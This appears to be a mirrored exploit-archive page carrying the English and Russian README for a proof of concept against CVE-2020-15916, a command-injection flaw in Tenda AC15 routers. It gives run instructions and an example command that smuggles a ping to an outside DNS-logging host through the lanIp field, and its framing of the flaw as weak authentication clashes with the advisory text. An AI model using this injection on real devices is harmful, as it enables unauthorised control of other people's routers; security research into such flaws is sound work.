Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2020-15916 PoC — Tenda AC15 AC1900 操作系统命令注入漏洞

Source
Associated Vulnerability
Title:Tenda AC15 AC1900 操作系统命令注入漏洞 (CVE-2020-15916)
Description:Tenda AC15 AC1900是中国腾达(Tenda)公司的一款无线路由器。 Tenda AC15 AC1900 15.03.05.19版本中的goform/AdvSetLanip端点存在安全漏洞。远程攻击者可借助‘lanIp POST’参数中的shell元字符利用该漏洞执行任意系统命令。
Description
This project is a PoC for exploiting CVE-2020-15916, a vulnerability that allows unauthorized changes to the LAN configuration of a device
Readme

# EN
**GenLANConfigAttack** -  is a PoC for exploiting **CVE-2020-15916**, a vulnerability that allows unauthorized changes to the LAN configuration of a device.

## Features
- Exploits LAN configuration vulnerability
- Sends malicious payload to alter network settings
- Bypasses security mechanisms for gaining control over the LAN

## How to Use
1. Clone this repository:
   ```bash
   git clone https://github.com/geniuszly/CVE-2020-15916
   ```
2. Install dependencies:
   ```bash
   pip install -r requirements.txt
   ```
3. Run the exploit:
   ```bash
   python GenLANConfigAttack.py
   ```

### Parameters
- `target_ip`: The IP address of the target device.
- `ping_command`: Command to execute on the target device.
- `session_password`: Password for session access.

## Example
```bash
python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
```

```bash
[Response from 192.168.0.1]: 
{"success":true,"message":"LAN IP configuration updated successfully"}
```

## CVE Reference
This PoC is for the CVE-2020-15916 vulnerability, which allows attackers to alter the LAN configuration of vulnerable devices by exploiting a weak authentication mechanism.

## Disclaimer
This tool is provided for educational purposes only. Use it responsibly and only in environments where you have explicit permission.


# RU
**GenLANConfigAttack** представляет собой PoC для эксплуатации уязвимости **CVE-2020-15916**, которая позволяет несанкционированно изменять конфигурацию LAN устройства.

## Функции
- Использует уязвимость конфигурации LAN
- Отправляет вредоносный payload для изменения настроек сети
- Обходит механизмы безопасности для получения контроля над LAN

## Как использовать
1. Клонируйте репозиторий:
   ```bash
   git clone https://github.com/geniuszly/CVE-2020-15916
   ```
2. Установите зависимости:
   ```bash
   pip install -r requirements.txt
   ```
3. Запустите эксплойт:
   ```bash
   python GenLANConfigAttack.py
   ```

### Параметры
- `target_ip`: IP-адрес целевого устройства.
- `ping_command`: Команда для выполнения на целевом устройстве.
- `session_password`: Пароль для сессионного доступа.

## Пример
```bash
python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
```

```bash
[Ответ от 192.168.0.1]: 
{"success":true,"message":"Конфигурация LAN IP успешно обновлена"}
```
## CVE-ссылка
Этот PoC эксплуатирует уязвимость CVE-2020-15916, которая позволяет злоумышленникам изменять конфигурацию LAN на уязвимых устройствах, используя слабую аутентификацию.

## Отказ от ответственности
Этот инструмент предоставляется исключительно в образовательных целях. Используйте его ответственно и только в тех средах, где у вас есть явное разрешение.
File Snapshot

[4.0K] /data/pocs/d97ee6b5b0edc3b408121696dbebc6dbb577b6b1 ├── [2.4K] GenLANConfigAttack.py ├── [1.0K] LICENSE └── [3.5K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.